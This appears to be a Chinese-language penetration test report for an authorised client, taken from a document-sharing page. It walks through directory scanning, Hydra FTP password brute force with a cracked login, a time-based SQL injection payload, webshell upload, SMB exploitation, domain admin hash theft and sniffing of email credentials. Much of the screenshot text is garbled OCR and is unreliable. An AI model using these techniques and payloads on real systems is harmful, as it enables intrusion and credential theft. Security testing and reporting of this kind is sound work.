渗透测试报告_第1页
渗透测试报告_第2页
渗透测试报告_第3页
渗透测试报告_第4页
渗透测试报告_第5页
已阅读5页,还剩2页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

某网络渗透测试报告目录0x1概述渗透范围渗透测试主要内容0x2脆弱性分析方法0x3渗透测试过程描述遍历目录测试弱口令测试Sql注入测试内网渗透内网嗅探0x4分析结果与建议0x1概述某时段接到xx网络公司授权对该公司网络进行模拟黑客攻击渗透,在xx年xx月xx日-XX年xx月xx日.对XX网络公司的外网服务器和内网集群精心全面脆弱性黑盒测试.完成测试得到此份网络渗透测试报告。渗透范围此次渗透测试主要包括对象:某网络公司外网web服务器•企业邮局服务器,核心商业数据服务器和内网办公网络系统。渗透测试主要内容本次渗透中,主要对某网络公司web服务器,邮件服务器进行遍历目录,用户弱口令猜解,sql注入漏洞,数据库挖掘,内网嗅探,以及域服务器安全等几个方面进行渗透测试。0x2脆弱性分析方法按照国家工信部is900标准,采用行业内认可的测试软件和技术人员手工操作模拟渗透。0x3渗透测试过程描述3.1遍历目录测试使用载入国内外3万多目录字典的wwwscan对web和邮件服务器进行目录探测。得到探测结果。主站不存在遍历目录和敏感目录的情况。但是同服务器站点存在edit编辑器路径。该编辑器版本过低。存在严重漏洞。如图3.2用户口令猜解Nmap收集到外网服务器ftp.使用默认的账号无法连接,于是对web和能登陆的界面进行弱口令测试,具体如下图・OX电Iait]:TargetPasswordsTuningSpecificStartOutputHydrav4.1(c)2004byvanHauser/THC-useallowedonlyforlegalpurposes.Hydra(http:/J)startingat2004-05-1721:58;52[DATA]32tasks,1servers,4S380logintri&s45330),-1418triespertask[DATA]attackingsarvic*ftponport21[STATUS]14056.00trles/min.14056tri&sin00:01hn31324todoin00:03h[STATUS]14513.00tries/min,29026trie-sin00:02hr16354todoin00:02h[21J[Ttp]host:login:marc[)assword:successHydra()finishedat2004-05-1722:01:38<finished>■■■■I■■■■■■■■■Istart^■■A-Stop|SaveOutputClearOutput■ftp」rnmrc尸/tmp,'pas£liGt.txt.-qns-t32sql注入测试通过手工配合工具检测sql注入得到反馈结果如下图Threatlevel赫Dcune^ixthreatlevelLevel3:High赫Dcune^ixthreatlevelLevel3:HighAlertsdistributioniTotalalertsfoundOHigh0Medium轸Low㈱InformationalOneormorehigh*severitytypevulnerabilitieshavebeendiscoveredbythescanrer.Amalicioususercanexploitthesewjherabilitiesandcompromisethebackenddatabaseand/ordefaceyourwebsite.732I5c>nii:-5c>nii:-Knwlede-:Sase--A14JTSh"nsr'-1"Z]Alartxd«1J••SlindS;L:njicilcc.App]iEat^cnarrc-tml-ASP.^ETdchuEEinfwisb:t:L-DEjOpa££F0Til~ja4-is-FtisslbleEinsitiTc-心丁弐s•SimianCoald.4Tltbsuti|.Br-okanlinJcx:Zs^ilfij±r4££tOIJIUL界础口日:TtE让工11E-J2.-•■-JhvbsctIclusare?iyp«InputL■wandowET«rsinHlEwricisi562222■I疔--lijij^wecreanems/pic_liistaspxD^taitLIRLe门匚ciclmdGETinputidwassetta1416;waitfordelayr0:0:4"一RequestGET/pi.c_l£stuaspx?i.d=%24^7binjecthere^7jiugou=75Snewsort=654parent=EDHIHost;旳卿■匚珏;00Coimection:Seep-aliveAccept-Eneeding:gaip^deflateUser-Agent:Moz.iLLa/4・0(ccin^atiblerMSIE5・gWindowsUT6.Q)ResponseHTTP/1・15OQInternalServerErrorDate;Frij25FebZOll02;14:45GMTServer;:Microsoft-IIS/6・DX-Powersd-By:ASP.NETX-AepNet-Version;3.0・5Q727Cache-Control;privateContent-Type:text/html;charset=utf一8Content-Length;10Z73/pic_liistaspxDetailsURLeh匚ciclEdGETinputidwassstta1418;waitfordelayr0:0:4'一RequestGET/piclietKaspx?id=%24%7fein-jecthers%^dfinswEort=65iparsnt=®0HTTP/1,1sjf后過■■巴1M1/孵£皿=<■■£二1\:址回|t]1apotld■tSparait■虽'7r应用程序中的服务器错误:■報入字符事的祸式车正确"%«:拥j当iff-.'EtCt求期(恥itmit聲I异话匹ittl删Biism,以了輛%51!#诅以最比码中葩曲的出轴谋闺常乩弄李洋細柱凰?S^iwriFcrnitExMtrf&rr航入孑将三的曙式护正确・[»ntid=int.Par5c(p.cqije5t.(tjueryString[*1d^].TflString0);oarent-1nt.PanseCRen^st.QueryStrlngrparenfj.Ia5crlngO)tnerHQrtid■^ai'entr1;ccm_d-stad-a«newcowwidatit)1国矍张g'■cngr_wwj1tw1i_t*a¥■的評小625[Fomftt£Kceptinn;SUh孚碉何EKBfr丑子正(U]5-ys-tai1Hurbcr.itrinoTQSuritsrfStringttr.nurtier3tyluoptions.NunberBuffer4:nunb^r.l-+JTfaerFnrriatJ.nfc!infc.DGclc-anparj«C%i:ina.l^1-Z7-5EZ1HSyLtaM.NuriJflr.PjrcAlnt32(51^1ngs.NdrioarStylKstyle.NurtiorFor'iiid.tInfoinfo)-*-112S^s-tai.lntJZ.ParstCstrings)1-2&—_*___AbBut_sh(WiP*ae_Ln-adfobjectsend*r.EventArgs-e)ingAbcut_2hciA'd-u-px.cs12SSyttiBf1Ueb1Lti111Ca.11~Helper..Eventij-口FurictinrCaL】ler(IfftFt「fp.tctoObject11EventArase)+135ytc-Ew.wefrrUHH.Cal11CMencHandierc#iegaceppoxy.Cal1iMckCObjeccsender,EventArose)+33Slr'ftfltiUisb..LI..CcntrDlLCnLn-&dCE.^entArgse)t995y5-c-E«,mIkOlrtcxitrDirLMdRec^ssveQWSyf<:>»1Uebi.UliP-age.ProcessRequEstfla."inl~Bao"lewincludeSt-aotsBsfareAs^ncPoint.BoalewincludeStantsA'FtiErAjsyncFnint)tLDEL戯苯信£!L血呻曲HNETFm呻旳Ejtf津2DSD?2T.1M2.NET.tff$:2C.5D72T13?&根据漏洞类别进行统计,如下所示:漏洞类别高中低风险值网站结构分析一一一3

目录遍历探测一一一4隐藏文件探测一一一3CGI漏洞扫描一一一0用户和密码猜解一一一10跨站脚本分析一一一0SQL注射漏洞挖掘(含数据库挖掘分析)———10风险总值303.4内网渗透当通过外围安全一些列检测。通过弱口令和注入2中方式进入管理后台。抓包上传webshell得到后门开始提升权限。当发现web服务器处于内网。也正好是在公司内部。于是收集了域的信息。想从web入手抓取域管理Hash破解,无果。所以只能寻找内网其他域管理密码。内外通过ipc漏洞控制了2个机器。获取到域管hash。用metasploitsmb溢出也得到内网机器权限同样也获得域内管理hash。用域管理hash登陆域服务器。内网的权限全部到手。晋01OSJ-J.3.DMembersDomainAdminsDesignatedadministratcrsofthedomain盟4GtchidnameComment逼心唇Kprator晋01OSJ-J.3.DMembersDomainAdminsDesignatedadministratcrsofthedomain盟4GtchidnameComment逼心唇KpratoranaAMK.uyaikThecommand,completedsuccessfullynetgroupdomaina-drniiLs^/donriainwillbeprocessedatailoniaitlcontrollerfordomainstltl9O6.loc=dJ_./icimain■lorn&iitcorflro11-=rfor>loni±inS:-Lui1101£'IniiiiO4緡mcJiariE蘆i£.1ani;Lt"iQ-UfiEiriDZZhouThecomm^TLpletedwithofleorrrior«errors_C:\Proje■二鼻启弩IL#■-歸i:*二》net>_iserThereq^u.^:stw1.11b>=prcess>=d-s.I■=.netiriew:\ProJenetiriew:\ProJeCl_T-rul-N^jITiCFQ5P01T-jXFFUIThwcommandcomriletedsklccessfuZly.C:\Fr0JectsS.Suneame\images\>pineReiilyE.epLyReiilzfi-ep]_yfromfromff■:-ITi10103.!□.103.10103.Id.105.55jrbyt_esReiilyE.epLyReiilzfi-ep]_yfromfromff■:-ITi10103.!□.103.10103.Id.105.55jrbyt_es=3£55.iW:brte==3Z551釘bytes=3255.1|:t-rte==3Ztirne<lniE11ms=Iftistime=Inistime=3msTTL=120TTL=1ZBTTL=126TTL=1ZB4,Los戈=0CO%Lossi^4,Los戈=0CO%Lossi^■i.nrTii111—s4rzori_ds:3ms,kveraee=ImsRepLy£t-omRsipLyfiromRepLy£f^mR.fip3_y"王fnmID.103.la103.10.103.ia103.III55.r11.11<<<<Fmgs-tati=tia=forLO.103.55.1Z:Fackets:Sent=4,Received=ApproHirri^tetr£p±irries1IV1inimufTi=0ms,Maximum=3c:?p——\>pizngAPE03Pixtcin柩Y丄_--.._.--.ifcc-Jt-:=1ocil[10.103.55.]wi-th.32by±esofda*a:3.5内网嗅探当得到内网权限其实就可以得到许多信息。但是主要是针对商业数据保密的原则。就还需要对内网数据传输进行一个安全检测。于是在内网某机器上安装cain进行嗅探得到一部分电子邮件内容信息和一些网络账号•具体看下图嗨蘇3彌曲IM蔺由|顧|管jHM袂|:njiMJ12?5:IJ:+St;+7;+iZ翰阿祐^:Llh:31Ii»i52t:W!5?J-~w:njiMJ12?5:IJ:+St;+7;+iZ翰阿祐^:Llh:31Ii»i52t:W!5?J-~wh-^1^^LL-.4?LL■^rrXJ-

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论